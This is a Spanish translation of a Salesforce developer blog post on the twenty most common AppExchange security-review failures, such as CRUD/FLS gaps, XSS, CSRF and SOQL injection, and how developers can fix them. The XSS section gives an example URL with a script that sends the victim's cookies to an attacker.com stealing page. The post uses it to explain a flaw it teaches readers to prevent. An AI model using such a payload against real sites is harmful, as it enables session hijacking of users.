Skip to content

Tag: security

Las 20 vulnerabilidades principales encontradas en la revisi贸n de seguridad de AppExchange 鈽侊笍

Las 20 vulnerabilidades principales encontradas en la revisi贸n de seguridad de AppExchange 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

Las 20 principales vulnerabilidades encontradas en la revisi贸n de seguridad de AppExchange | Blog de desarrolladores de Salesforce

Se sabe que la revisi贸n de seguridad de AppExchange es uno de los procesos de revisi贸n m谩s rigurosos de cualquier mercado de aplicaciones en l铆nea. Esta estricta reputaci贸n es algo de lo que Salesforce se enorgullece, siendo la confianza nuestro valor n煤mero uno. Como mercado de software empresarial, tenemos la profunda responsabilidad de cumplir con los m谩s altos est谩ndares de seguridad posibles para la protecci贸n de los datos de los clientes.

Dicho esto, estos est谩ndares pueden representar un desaf铆o importante para los socios ISV que buscan publicar ofertas en AppExchange. Para ayudar a mejorar la transparencia y ayudarlos a todos a tener 茅xito, en orden de prevalencia, esta publicaci贸n analizar谩 las 20 razones principales por las que los socios no pasan la revisi贸n de seguridad (a partir de 2023). Tambi茅n cubriremos c贸mo remediar o prevenir estos problemas.

#1 鈥 Aplicaci贸n de CRUD/FLS

驴Qu茅 es esto?

Las vulnerabilidades de aplicaci贸n de la seguridad a nivel de objetos y campos (CRUD/FLS) son la raz贸n principal (por un margen significativo) para no pasar la revisi贸n de seguridad de AppExchange. Estas vulnerabilidades representan fallas al verificar adecuadamente si los objetos y/o campos son accesibles, creables, eliminables y/o actualizables antes de ejecutar consultas o acciones de base de datos. Si su oferta de AppExchange contiene alg煤n c贸digo de Salesforce, este problema debe ser su prioridad n煤mero uno a resolver antes de enviarlo para una revisi贸n de seguridad.

驴C贸mo puedo abordar esto?

Si, durante su proceso de codificaci贸n, no ha implementado consistentemente comprobaciones CRUD/FLS o no ha ejecutado SOQL, SOSL y DML en modo de usuario, querr谩 hacer una revisi贸n muy exhaustiva de su c贸digo base para asegurarse de que no est茅 realizar cualquier operaci贸n de creaci贸n/lectura/actualizaci贸n/eliminaci贸n no marcada en objetos o campos.

El m茅todo preferido y moderno para hacer cumplir CRUD/FLS implica utilizar el modo de usuario en todas las consultas y operaciones de bases de datos. La desventaja de esto es que Checkmarx, PMD y el motor de reglas PMD de Code Analyzer a煤n no lo admiten completamente (al momento de escribir esta publicaci贸n, PMD admite WITH USER_MODE en SOSL/SOQL, pero no el modo de usuario DML, por lo que si usa este tipo de protecci贸n arrojar谩 falsos positivos). Code Analyzer Graph Engine es actualmente la 煤nica herramienta que admite ambos tipos de modos de usuario. Consulte el comando scanner:run:dfa en la documentaci贸n para ejecutar un escaneo con Code Analyzer Graph Engine.

Si ha estado aplicando CRUD/FLS a la antigua usanza con Schema.DescribeSObjectResult (es decir, m茅todos como isCreatable() , isUpdateable() , isDeletable() ), entonces Code Analyzer y la extensi贸n PMD para VS Code pueden ser 煤tiles herramientas que puede utilizar para comprobar su c贸digo base. Puede seguir nuestra gu铆a para obtener m谩s informaci贸n sobre c贸mo utilizar PMD para VS Code y Code Analyzer para eliminar las infracciones CRUD/FLS.

El esc谩ner Checkmarx debe utilizarse como verificaci贸n final de violaciones de CRUD/FLS. Puede ejecutar este an谩lisis a trav茅s del Portal de seguridad para socios .

Obtenga m谩s informaci贸n sobre la aplicaci贸n de CRUD/FLS en Trailhead .

#2 鈥 Versi贸n de software insegura

驴Qu茅 es esto?

Esto significa que alguna pieza de software (normalmente, una versi贸n espec铆fica del software) utilizada en su oferta tiene vulnerabilidades de seguridad conocidas. La mayor铆a de las veces, es porque est谩s usando una versi贸n desactualizada de una biblioteca de JavaScript (por ejemplo, jQuery es, con diferencia, la m谩s com煤n), pero tambi茅n podr铆a ser algo as铆 como versiones antiguas de nginx, bibliotecas de Python, CKEditor o PHP.

驴C贸mo puedo abordar esto?

Intente identificar todas las bibliotecas, marcos, software y otras tecnolog铆as que no sean de Salesforce dentro del alcance de su oferta de AppExchange.

Busque cada uno de estos en Snyk (para proyectos de c贸digo abierto) o en la base de datos CVE . CVE significa "vulnerabilidades y exposiciones comunes" y la base de datos CVE representa un glosario de vulnerabilidades de seguridad conocidas p煤blicamente que es mantenido y operado por el FFRDC Nacional de Ciberseguridad de EE. UU. y MITRE Corporation. Tambi茅n puede utilizar el complemento RetireJS de Salesforce Code Analyzer para ejecutar un escaneo de su c贸digo base empaquetado para buscar bibliotecas de JavaScript con vulnerabilidades conocidas.

Nota: En algunos casos, puede agregar documentaci贸n de falsos positivos para argumentar que un CVE particular registrado no podr铆a aplicarse a su oferta, ya que quiz谩s no est茅 utilizando la funcionalidad asociada con ese CVE.

#3 鈥 Violaci贸n al compartir

驴Qu茅 es esto?

B谩sicamente, esto significa que tiene clases de Apex en las que no ha agregado expl铆citamente la palabra clave with sharing al encabezado de la clase, omitiendo as铆 las reglas de uso compartido de una organizaci贸n.

驴C贸mo puedo abordar esto?

Simplemente verifique todas sus clases de Apex y aseg煤rese de tener with sharing (o el uso compartido heredado) definido en el encabezado de la clase. Para los casos en los que necesita que una clase se ejecute sin compartir (por ejemplo, la clase debe ejecutarse en un contexto de sistema y no en un contexto de usuario), agregue una explicaci贸n a su documento de falso positivo que explique el caso de uso empresarial (e idealmente, agregue comentarios en la parte superior). de los encabezados de clase relevantes para que quede a煤n m谩s claro).

Code Analyzer , PMD para VS Code y Checkmarx tambi茅n pueden ayudarlo a escanear su c贸digo.

Obtenga m谩s informaci贸n sobre c贸mo compartir el cumplimiento a trav茅s de Trailhead .

#4: Almacenamiento inseguro de datos confidenciales

驴Qu茅 es esto?

Los secretos no deben estar codificados en el c贸digo fuente. Aunque el c贸digo puede estar contenido en un paquete administrado donde el c贸digo est谩 oculto para los clientes, todav铆a existen razones por las que esta es una pr谩ctica insegura, entre ellas:

  • El cliente debe tener control sobre sus secretos y claves y, en muchos casos, debe poder cambiarlos o actualizarlos.
  • Los secretos pueden quedar expuestos en registros o mensajes de error
  • Si un secreto o clave caduca, el cliente no podr谩 actualizarlo por s铆 mismo.

驴C贸mo puedo abordar esto?

Aseg煤rese de que no haya secretos codificados en el c贸digo fuente, incluso si es un paquete administrado. Aseg煤rese de que todos los secretos se almacenen de una de las siguientes maneras:

  • Campos de metadatos personalizados protegidos (para secretos propiedad de socios)
  • Configuraciones personalizadas protegidas (para secretos propiedad del suscriptor/cliente)
  • Credenciales con nombre (esto generalmente no se recomienda, pero si tiene un caso de uso espec铆fico que lo requiera, es posible que se permita caso por caso)
  • Cifrado y almacenado en objetos personalizados con la clave de cifrado almacenada en una configuraci贸n personalizada protegida o en un campo de metadatos personalizados ocultos

Obtenga m谩s informaci贸n sobre el almacenamiento seguro de secretos en Trailhead .

#5 鈥 Configuraci贸n TLS/SSL

驴Qu茅 es esto?

Todas las conexiones entrantes y salientes que involucran a sus comunidades, sitios y portales de Salesforce deben utilizar Transport Layer Security (TLS) 1.2. Este requisito es v谩lido en los modos Lightning Experience y Salesforce Classic para comunidades y sitios, independientemente de si est谩n en las ediciones Essentials, Enterprise, Performance, Unlimited o Developer.

驴C贸mo puedo abordar esto?

Verifique que el acceso a su navegador, las integraciones de API y otras funciones de Salesforce sean compatibles con TLS 1.2.

Una forma sencilla de hacerlo es utilizar Qualys SSL Scanner. El equipo de revisi贸n de seguridad ejecutar谩 este an谩lisis en todos y cada uno de los puntos finales externos o que no sean de Salesforce involucrados en su soluci贸n. Si sus terminales no reciben una calificaci贸n A por cumplimiento de SSL/TLS, su revisi贸n de seguridad no ser谩 aprobada.

Para ejecutar el escaneo, simplemente ingrese la URL base en el formulario web de prueba del servidor SSL de Qualys y presione Enviar.

Puede encontrar m谩s detalles sobre los requisitos de TLS en las notas de la versi贸n .

#6 鈥 Informaci贸n confidencial en depuraci贸n

驴Qu茅 es esto?

Este tipo de vulnerabilidad describe situaciones en las que se filtra informaci贸n confidencial, como secretos de aplicaciones, datos del sistema o informaci贸n de depuraci贸n demasiado detallada, a trav茅s de funciones de registro u otros flujos de salida. Por lo general, esto sucede cuando el registro detallado est谩 habilitado para fines de desarrollo, pero luego no se reduce adecuadamente antes de enviarlo para la revisi贸n de seguridad de AppExchange.

驴C贸mo puedo abordar esto?

En su paquete de Salesforce, aseg煤rese de buscar en su c贸digo fuente todas las declaraciones de depuraci贸n del paquete para asegurarse de que no registren informaci贸n confidencial o secretos.

Aseg煤rese de que los c贸digos de error y los mensajes de error en toda su soluci贸n tengan un nivel de informaci贸n apropiado para que todos los usuarios los vean. Por ejemplo, los usuarios habituales generalmente no deber铆an ver seguimientos de pila completos ni informaci贸n de depuraci贸n detallada. De manera similar, aseg煤rese de que otras funciones de registro o flujos de salida tampoco filtren datos confidenciales.

Code Analyzer y PMD para VS Code pueden ayudarlo a detectar estos problemas en las aplicaciones de Salesforce, y los esc谩neres de aplicaciones web como Burp Suite , Chimera u OWASP ZAP tambi茅n pueden ayudarlo a detectar estos problemas en sus integraciones externas y aplicaciones web.

Obtenga m谩s informaci贸n sobre c贸mo verificar los seguimientos de la pila e informaci贸n detallada sobre las excepciones en el n煤mero 13.

#7 – CSRF

驴Qu茅 es esto?

La falsificaci贸n de solicitudes entre sitios (CSRF) es un tipo de ataque que enga帽a a una v铆ctima para que ejecute acciones no deseadas en una aplicaci贸n web en la que est谩 autenticada. Explotar la confianza que un sitio tiene en el navegador del usuario puede llevar a acciones potencialmente da帽inas, como cambiar direcciones de correo electr贸nico y contrase帽as, o incluso realizar transacciones sin el conocimiento o consentimiento del usuario.

En la plataforma Salesforce, existe un token anti-CSRF para contrarrestar dichos ataques, que ofrece protecci贸n mientras se utilizan controladores y m茅todos est谩ndar. Sin embargo, los desarrolladores pueden eludir involuntariamente estas salvaguardas anti-CSRF al crear sus propios m茅todos de acci贸n.

驴C贸mo puedo abordar esto?

En general, las aplicaciones web pueden prevenir ataques CSRF principalmente implementando tokens anti-CSRF, que son valores 煤nicos y espec铆ficos del usuario incluidos en cada solicitud de cambio de estado para verificar la fuente. Adem谩s, deben adoptar la pr谩ctica de cookies del mismo sitio, que impide que el navegador env铆e la cookie junto con solicitudes entre sitios, mitigando as铆 los riesgos de CSRF.

Para p谩ginas de Visualforce:

  • Al crear p谩ginas de Visualforce, evite utilizar solicitudes HTTP GET que cambien de estado; use POST o PUT para cambios de estado en su lugar
  • No ejecute acciones autom谩ticas ni cambie el estado (por ejemplo, operaciones DML) al cargar la p谩gina.
  • Otra t茅cnica de mitigaci贸n implica agregar una p谩gina de confirmaci贸n intermedia antes de realizar la acci贸n, donde el usuario puede confirmar que ten铆a la intenci贸n de realizar esa acci贸n.

Para componentes Lightning:

  • De manera similar a las p谩ginas de Visualforce, evite cambiar el estado o ejecutar acciones al cargar un componente Lightning, mediante enlaces como init (para Aura) ,connectedCallback , renderedCallback o constructor .

Al realizar llamadas API:

  • Para las API que no son de Salesforce, es posible que tambi茅n desee agregar su propio token CSRF.

CSRF es uno de los tipos de problemas de seguridad m谩s complicados, por lo que vale la pena invertir en aprender m谩s sobre 茅l en profundidad. Para los paquetes de Salesforce, existe excelente documentaci贸n para desarrolladores y un m贸dulo Trailhead como referencia.

Para otros tipos de aplicaciones web, es posible que desees consultar la documentaci贸n de OWASP .

Los esc谩neres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , tambi茅n pueden ayudarle a detectar estos problemas en sus aplicaciones web externas.

N.潞 8: secuencias de comandos entre sitios (XSS) almacenadas y reflejadas

驴Qu茅 es esto?

Los ataques de secuencias de comandos entre sitios (XSS) son problemas de inyecci贸n en los que se insertan secuencias de comandos da帽inas en sitios web confiables. Ocurren cuando un atacante explota una aplicaci贸n web para enviar c贸digo malicioso, a menudo un script del lado del cliente, a un usuario diferente. Estos ataques explotan fallas en aplicaciones web que utilizan entradas de usuario no validadas o codificadas en su salida.

En un ataque XSS, el navegador de un usuario desprevenido ejecuta el script malicioso, creyendo que proviene de una fuente confiable. Esto permite que el script acceda a cookies, tokens de sesi贸n u otros datos confidenciales almacenados en el navegador. Incluso puede modificar el contenido HTML de la p谩gina.

Los ataques XSS almacenados son de tipo persistente, en los que la aplicaci贸n web almacena la entrada maliciosa y luego se muestra a los usuarios. Los ataques XSS reflejados, por otro lado, generalmente ocurren cuando se inyecta c贸digo malicioso en una URL, que se ejecuta cuando un usuario hace clic en ella (por ejemplo: http://example.com/search?query=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script> ).

Los motivos por los que su aplicaci贸n podr铆a ser susceptible incluyen:

  • Entrada no validada : las aplicaciones pueden aceptar entradas del usuario y usarlas o mostrarlas en una p谩gina sin validarlas adecuadamente (para garantizar que no contenga c贸digo/scripts ejecutables).
  • Campos de texto enriquecido : almacenar entradas en campos RTF de Salesforce es riesgoso porque admiten contenido HTML, por lo que debe validar la entrada para evitar que se almacenen XSS.
  • P谩ginas de Visualforce : pueden ser susceptibles si utilizan entradas generadas por el usuario en el cuerpo HTML o en JavaScript sin un escape de entrada o codificaci贸n de salida adecuados.
  • Componentes web Aura y Lightning (LWC) : aunque tienen protecciones integradas contra XSS, los desarrolladores pueden evitar estas protecciones mediante cosas como el uso de la propiedad innerHTML , lwc:dom=鈥漨anual鈥 o el componente lightning:formattedRichText sin la validaci贸n de entrada adecuada.
  • Par谩metros de URL : las aplicaciones pueden usarlos directamente en el HTML o JavaScript de una p谩gina sin validaci贸n (lo que lleva a XSS reflejado).

驴C贸mo puedo abordar esto?

Su objetivo principal debe ser evitar la manipulaci贸n de DOM, pero tambi茅n recomendamos practicar el filtrado de entrada y la codificaci贸n de salida, que incluyen:

  • Evite la manipulaci贸n del modelo de objetos de documento (DOM): en su lugar, utilice t茅cnicas como directivas de plantilla y evite funciones de JavaScript potencialmente inseguras (por ejemplo, eval() , DOMParser.parseFromString() , Document.implementation.createHTMLDocument() , setTimeout() , setInterval() )
  • Filtrado de entrada: aseg煤rese de que la entrada del usuario no contenga c贸digo ejecutable mediante el uso de expresiones regulares y listas de bloqueo o listas de permitidos (por ejemplo, filtre los caracteres com煤nmente utilizados en el c贸digo, como '<', '>', comillas simples o dobles, ' /', ';', corchetes, par茅ntesis u operadores matem谩ticos o l贸gicos como '+', '&' o '-')
  • Codificaci贸n de salida : aseg煤rese de que si el c贸digo ejecutable pasara el filtrado de entrada, no se interprete como c贸digo al convertir caracteres "peligrosos" en versiones de texto inofensivas (por ejemplo, '&; debe convertirse a &amp; y '<' o '>' debe convertirse a &lt; y &gt;)

Este m贸dulo de Trailhead explica exactamente c贸mo mitigar XSS con estas t茅cnicas, y nuestra documentaci贸n para desarrolladores tambi茅n es 煤til aqu铆. Para obtener consejos espec铆ficos sobre la protecci贸n contra XSS en componentes Lightning, consulte la p谩gina Seguridad Lightning en la Gu铆a de codificaci贸n segura.

Para aplicaciones web que no son de Salesforce, tambi茅n puede consultar la documentaci贸n de OWASP para obtener consejos adicionales.

Los esc谩neres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , tambi茅n pueden ayudarle a detectar estos problemas.

#9: JavaScript no est谩 en recursos est谩ticos

驴Qu茅 es esto?

Muchos paquetes administrados por Salesforce no pasan la revisi贸n de seguridad por no almacenar JavaScript como recursos est谩ticos en sus paquetes y, en su lugar, se vinculan a archivos JavaScript alojados externamente con etiquetas <script> . La raz贸n principal de esta regla es que permite un control de versiones mucho m谩s seguro y garantiza la integridad de los archivos JavaScript en su paquete de Salesforce incluso si la fuente externa est谩 comprometida.

驴C贸mo puedo abordar esto?

Nuestra regla es que todos los recursos de script y estilo deben agregarse al paquete como recursos est谩ticos y luego cargarse con una etiqueta <apex:includeScript> en su p谩gina (para Visualforce) o un ltng:require en su .cmp o .app. marcado (para Aura).

Nota: Si tiene un LWC, defina los m贸dulos JavaScript que importe a su componente o use la funci贸n loadScript para cargar un archivo JavaScript de recursos est谩ticos.

Para paquetes que no son LWC, la mejor manera de verificar este problema es buscar manualmente su c贸digo fuente para asegurarse de que todas las bibliotecas de JavaScript est茅n almacenadas como recursos est谩ticos, no cargadas din谩micamente a trav茅s de hiperv铆nculos.

Para situaciones en las que esto no sea factible, recomendamos programar una cita en horario de oficina t茅cnica para analizar su caso de uso. Es posible obtener una excepci贸n en ciertos casos.

Obtenga m谩s informaci贸n sobre este problema en nuestra documentaci贸n para desarrolladores .

#10 鈥 Inyecci贸n SOQL

驴Qu茅 es esto?

La inyecci贸n SOQL es la versi贸n espec铆fica de Salesforce de la inyecci贸n SQL. Ocurre cuando una entrada no validada proporcionada por el usuario se inserta directamente en una consulta SOQL din谩mica. Si la entrada no est谩 validada, puede incluir comandos SOQL que modifican efectivamente la declaraci贸n SOQL y enga帽an a la aplicaci贸n para que ejecute comandos no deseados.

驴C贸mo puedo abordar esto?

La forma m谩s sencilla de evitar el problema es evitar consultas din谩micas en favor de consultas est谩ticas y utilizar variables vinculantes. De lo contrario, deber谩 validar estrictamente las entradas del usuario antes de usarlas en consultas mediante t茅cnicas como encasillamiento, lista blanca de entradas o escape.

Code Analyzer , PMD para VS Code y Checkmarx tambi茅n pueden ayudarlo a escanear su c贸digo.

Para obtener m谩s informaci贸n, consulte nuestro m贸dulo Trailhead o revise nuestra documentaci贸n para desarrolladores .

Para aplicaciones que no son de Salesforce, es posible que desee obtener m谩s informaci贸n sobre la inyecci贸n SQL en la gu铆a OWASP . Los esc谩neres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , tambi茅n pueden ayudar a identificar problemas de inyecci贸n SQL.

#11 鈥 Lightning: carga CSS inadecuada

驴Qu茅 es esto?

Similar al problema de usar etiquetas <script> o <link> para cargar JavaScript en sus paquetes, usar etiquetas <link> o <style> para cargar CSS en lugar de <apex:stylesheet> (Visualforce) o <ltng:require> ( Aura) se considera una pr谩ctica insegura. Estas etiquetas <link> y <style> pueden hacer referencia a recursos externos o en l铆nea que contienen CSS o JavaScript, y la arquitectura de seguridad Lightning Web Security (LWS) de Salesforce no los controla ni los desinfecta.

Para los componentes de Aura, en particular, el uso de <ltng:require> tambi茅n permite a Salesforce aplicar correctamente las reglas de seguridad LWS y garantizar que el CSS que est谩 cargando est茅 correctamente aislado y no incluya c贸digo o estilos JavaScript no seguros que puedan afectar negativamente a otros. partes de su aplicaci贸n Salesforce.

驴C贸mo puedo abordar esto?

Para hacer referencia a un recurso CSS externo que haya subido como recurso est谩tico, use una etiqueta <apex:stylesheet> en su p谩gina (para Visualforce) o una etiqueta <ltng:require> en su marcado .cmp o .app (para Aura ). Busque el c贸digo fuente de su paquete para asegurarse de que no haya utilizado etiquetas <link> o <style> en ning煤n lugar para cargar recursos CSS.

Nota: Si tiene una LWC, no puede encontrarse con este problema de todos modos porque, al igual que las etiquetas <script> , las etiquetas <style> ya est谩n bloqueadas para su uso dentro de las plantillas HTML. En su lugar, incluir铆a su CSS en el archivo CSS asociado de su componente o usar铆a la funci贸n loadStyle para cargar un archivo CSS de recursos est谩ticos.

Puede encontrar m谩s informaci贸n en nuestra documentaci贸n para desarrolladores .

#12: JavaScript en Salesforce DOM (solo experiencia cl谩sica)

驴Qu茅 es esto?

Salesforce tiene reglas estrictas sobre el uso de JavaScript y una de esas reglas es que JavaScript no se puede ejecutar directamente dentro del contexto de la aplicaci贸n Salesforce. Esto significa que no puede incluir bloques de JavaScript directamente dentro de los componentes que se ejecutan en Salesforce DOM, como HomePageComponents, WebLinks, Custom Buttons, etc.

En cambio, todo JavaScript debe residir bajo el dominio de espacio de nombres de su aplicaci贸n en las p谩ginas de Visualforce que usted controla, de modo que el JavaScript personalizado est茅 esencialmente aislado del DOM principal de Salesforce. Eso significa que no puede usar JavaScript para crear botones personalizados, pesta帽as web, componentes de p谩gina de inicio y elementos similares (por ejemplo, incluir controladores de eventos de JavaScript onclick en botones personalizados podr铆a ser motivo de falla).

驴C贸mo puedo abordar esto?

Esto es algo que deber谩 verificar manualmente en el c贸digo fuente de su paquete Salesforce. Verifique y aseg煤rese de que no haya utilizado JavaScript para crear botones personalizados, pesta帽as web, componentes de la p谩gina de inicio u otros elementos similares, y verifique que cualquier JavaScript personalizado est茅 incluido solo en el dominio de su aplicaci贸n con espacio de nombres en las p谩ginas de VisualForce que controla como parte de su aplicaci贸n.

Una forma de verificar esto es buscar el texto <openType>onClickJavaScript</openType> en los archivos de metadatos de la aplicaci贸n (a menudo en archivos XML como weblink/something.weblink) y, si lo encuentra, aseg煤rese de eliminarlo. Incluso si su aplicaci贸n solo est谩 destinada a usarse en Lightning Experience, si la vulnerabilidad est谩 presente para los usuarios en modo Cl谩sico, el paquete no se puede aprobar.

Esta regla en particular no est谩 especialmente bien documentada, pero puede leer m谩s en el documento Lista de verificaci贸n de revisi贸n de seguridad de AppExchange (se requiere iniciar sesi贸n en la comunidad de socios).

#13 鈥 Divulgaci贸n de informaci贸n en p谩ginas de error y excepciones

驴Qu茅 es esto?

En el contexto de la revisi贸n de seguridad de AppExchange, este t茅rmino se refiere espec铆ficamente a situaciones (generalmente en aplicaciones o servicios web que no son de Salesforce o fuera de plataforma) donde sus p谩ginas de error muestran datos confidenciales del sistema o informaci贸n de depuraci贸n. Por ejemplo, a veces las p谩ginas de error incluyen seguimientos de pila completos que muestran c贸mo se hace referencia internamente a los objetos o rutas de archivo relativas al lugar donde est谩 instalada la aplicaci贸n. A veces, incluso la informaci贸n confidencial queda expuesta de esta manera.

驴C贸mo puedo abordar esto?

Busque en su base de c贸digo llamadas que causen excepciones o que los seguimientos de pila se representen en cadenas o flujos de salida, y realice pruebas que puedan causar errores, como entradas no v谩lidas, entradas vac铆as, entradas demasiado largas, acceso a p谩ginas internas sin autenticaci贸n, omisi贸n de aplicaciones. flujo, etc

La herramienta de fuzzing de Burp Suite puede ser una gran ayuda en este caso.

Tambi茅n puede obtener excelentes consejos para realizar pruebas de seguimiento de pila a trav茅s de esta gu铆a de OWASP .

#14 鈥 Componentes de Aura: componente externo de CSS

驴Qu茅 es esto?

Se supone que los componentes de Aura son peque帽os, aut贸nomos, reutilizables y reposicionables. CSS que evita la encapsulaci贸n de componentes (a trav茅s de .THIS) o que utiliza un posicionamiento no est谩ndar (por ejemplo, flotante o posici贸n: absoluta o fija) infringe estas garant铆as y puede interferir con la visualizaci贸n de otros componentes. En particular, el uso del posicionamiento absoluto en CSS es la raz贸n principal de este tipo de falla.

Si bien esto puede no parecer un problema de seguridad a primera vista, puede alterar el dise帽o del sitio web de Salesforce y viola el esp铆ritu del modelo de seguridad de Lightning, donde los componentes est谩n estrictamente aislados y se garantiza que permanecer谩n en su propio carril.

驴C贸mo puedo abordar esto?

Este es otro problema que debes verificar manualmente. B谩sicamente, busque en el CSS de su componente Aura, especialmente para posicionamiento absoluto/fijo o ancho y alto fijos. Tambi茅n recomendamos revisar nuestra documentaci贸n para asegurarse de que est谩 siguiendo todas las reglas CSS correctas.

#15 鈥 Canal de mensajes expuesto

驴Qu茅 es esto?

Este t茅rmino se refiere espec铆ficamente a los casos en los que no ha configurado el indicador isExposed en Lightning Message Channel en falso. Dado que esto proporciona acceso a la API del Servicio de mensajes Lightning (LMS), que le permite publicar y suscribirse a mensajes en todo el DOM y entre Aura, Visualforce y Lightning Web Components, debe establecerse en falso a menos que sea realmente necesario.

驴C贸mo puedo abordar esto?

Tiene dos opciones, seg煤n su caso de uso, que incluyen:

  1. Registre un ticket de soporte para solicitar que se habilite la eliminaci贸n de componentes administrados para su paquete u organizaci贸n de Dev Hub y elimine el componente del paquete. Si no puede hacerlo (por ejemplo, si esto afectar铆a la funcionalidad de los suscriptores que dependen de canales de mensajes expuestos), puede dejar el componente en el paquete y simplemente no usarlo (aseg煤rese de mencionar esto espec铆ficamente en un mensaje falso). documento positivo sobre su presentaci贸n).
  2. Si tiene que utilizar un componente de canal LMS, aseg煤rese de tener isExposed=false . Esto debe hacerse creando un nuevo componente de canal LMS porque los componentes existentes con isExposed=true no pueden cambiar isExposed=false . Utilice 煤nicamente el componente reci茅n creado en el c贸digo.

M谩s informaci贸n est谩 disponible en la documentaci贸n .

#16 鈥 Informaci贸n confidencial en URL

驴Qu茅 es esto?

Esto se refiere a una situaci贸n en la que se env铆a informaci贸n confidencial de larga duraci贸n en URL (por ejemplo, un ID o secreto de cliente, o un nombre de usuario/contrase帽a). En realidad, esto puede llevar a que se filtren secretos a largo plazo de varias maneras posibles. Por ejemplo:

  • Las URL completas a menudo se almacenan en servidores en registros de texto sin cifrar que pueden no almacenarse de forma segura y pueden ser vistos por el personal o comprometidos por un tercero.
  • Los motores de b煤squeda indexan URL y almacenan inadvertidamente informaci贸n confidencial
  • Almacenamiento de rutas URL completas en el historial del navegador local, cach茅 del navegador, marcadores y marcadores sincronizados entre dispositivos
  • Informaci贸n de URL enviada a aplicaciones web de terceros a trav茅s del encabezado de referencia o expuesta a scripts de terceros en la p谩gina

驴C贸mo puedo abordar esto?

Burp Suite puede ayudarle aqu铆 para aplicaciones web que no sean de Salesforce o fuera de plataforma, pero en general recomendamos comprobar manualmente su aplicaci贸n para detectar cualquier caso en el que se env铆en secretos a largo plazo a trav茅s de URL. Dependiendo de su caso de uso, es posible que deba realizar cambios, como usar solicitudes POST en lugar de solicitudes GET, cambiar su m茅todo de autenticaci贸n (OAuth 2.0 es generalmente ideal) y emplear cifrado y mejores m茅todos de almacenamiento de secretos.

La gu铆a OWASP es un gran recurso a seguir.

#17 鈥 Punto final inseguro

驴Qu茅 es esto?

El nombre de esta vulnerabilidad simplemente se refiere a situaciones en las que se utiliza HTTP en lugar de HTTPS.

驴C贸mo puedo abordar esto?

Las herramientas de escaneo pueden ser de ayuda, pero una forma a煤n m谩s segura de verificar esto es buscar en el c贸digo fuente enlaces HTTP y cambiarlos a HTTPS. Puede aprender un poco m谩s sobre c贸mo esto mejora la seguridad en esta p谩gina de OWASP .

#18 鈥 Enumeraci贸n de nombre de usuario o correo electr贸nico

驴Qu茅 es esto?

Por lo general, este problema solo surge en aplicaciones web externas fuera de la plataforma Salesforce. Se refiere a una situaci贸n en la que los atacantes pueden enumerar listas de nombres de usuario o correos electr贸nicos de su base de usuarios, generalmente analizando cambios en mensajes de error en funciones de inicio de sesi贸n, funciones de olvido de contrase帽a o registros de cuentas. Los atacantes suelen hacer esto para poder comprobar si hay contrase帽as reutilizadas de bases de datos comprometidas y fugas o volcados de contrase帽as.

驴C贸mo puedo abordar esto?

Verifique sus mensajes de error para registros de cuentas, recuperaci贸n de contrase帽as, intentos de inicio de sesi贸n, etc., y aseg煤rese de que su mensaje de error sea el mismo independientemente de si el nombre de usuario o el correo electr贸nico ingresado es v谩lido.

Por ejemplo, muchos sitios incluyen un mensaje gen茅rico, como: "Si dicho usuario existe, recibir谩 un correo electr贸nico con un restablecimiento de contrase帽a". Este tipo de mensaje general evita confirmar la existencia de un nombre de usuario o correo electr贸nico.

Por supuesto, en determinadas situaciones, puede ser inevitable (por ejemplo, durante el registro de una cuenta, es posible que deba confirmar que se ha utilizado un nombre de usuario). En esas situaciones, intente implementar controles que impidan la enumeraci贸n por fuerza bruta, como captchas para evitar que los robots eliminen su formulario de registro.

Burp Suite es una excelente herramienta para verificar esto, pero si no la tiene, tambi茅n puede revisar sus funcionalidades de inicio de sesi贸n manualmente.

OWASP tiene una gu铆a 煤til para evitar la enumeraci贸n de correos electr贸nicos y nombres de usuarios.

#19 鈥 Gesti贸n de contrase帽as

驴Qu茅 es esto?

En ocasiones, el equipo de seguridad falla en sitios y aplicaciones web externos (que no sean Salesforce) por tener pol铆ticas de contrase帽as problem谩ticas, como por ejemplo:

  • Permitir la reutilizaci贸n de la misma contrase帽a cuando es necesario restablecerla
  • No solicitar la contrase帽a anterior cuando se permite a los usuarios establecer una nueva contrase帽a
  • Para restablecer la contrase帽a, enviar una contrase帽a temporal al correo electr贸nico de un usuario en texto sin formato
  • Dejar contrase帽as predeterminadas en los usuarios ra铆z del servidor o de la base de datos

驴C贸mo puedo abordar esto?

Adem谩s de evitar las situaciones anteriores, consulte la Hoja de referencia de autenticaci贸n de OWASP para obtener algunas pautas sobre c贸mo establecer pol铆ticas de contrase帽as seguras:

Burp Suite tambi茅n es muy 煤til para identificar problemas relacionados con las contrase帽as (por ejemplo, puede usarlo para intentar forzar sus p谩ginas de inicio de sesi贸n).

#20 鈥 Eco de contrase帽a

驴Qu茅 es esto?

Esto es un poco diferente del problema de administraci贸n de contrase帽as descrito anteriormente. Un eco de contrase帽a se refiere a situaciones en las que las contrase帽as se reflejan en texto sin formato en la interfaz de usuario (como cuando el usuario visita su propia p谩gina de configuraci贸n) o en llamadas API/respuestas JSON.

驴C贸mo puedo abordar esto?

Aseg煤rese de que su contrase帽a no se revele ni se transmita en texto sin formato en ninguna parte de su aplicaci贸n. Aseg煤rese de que en las p谩ginas de configuraci贸n u otras p谩ginas que muestran secretos, se muestren solo como asteriscos (se pueden mostrar al hacer clic en el bot贸n si es necesario).

Consulte la hoja de referencia sobre almacenamiento de contrase帽as de OWASP para obtener m谩s informaci贸n.

Burp Suite , o quiz谩s Chimera u OWASP ZAP , tambi茅n pueden ayudarle a detectar estos problemas.

Recursos adicionales

Si su soluci贸n incluye sitios web o aplicaciones web personalizados que no son de Salesforce, le recomendamos encarecidamente invertir en una licencia de Burp Suite si es financieramente viable para su organizaci贸n. Burp Suite es una de las mejores herramientas de seguridad del mercado y tambi茅n la utiliza mucho nuestro propio equipo de seguridad de productos. Chimera u OWASP ZAP son alternativas completamente gratuitas, pero prep谩rate para invertir m谩s tiempo en t茅rminos de revisi贸n manual, ya que carecen de muchas de las potentes funciones/herramientas que tiene Burp Suite.

Nota: Si su oferta se integra con aplicaciones o servicios web que no son de su propiedad, no intente escanear los puntos finales hasta que haya obtenido el permiso del propietario.

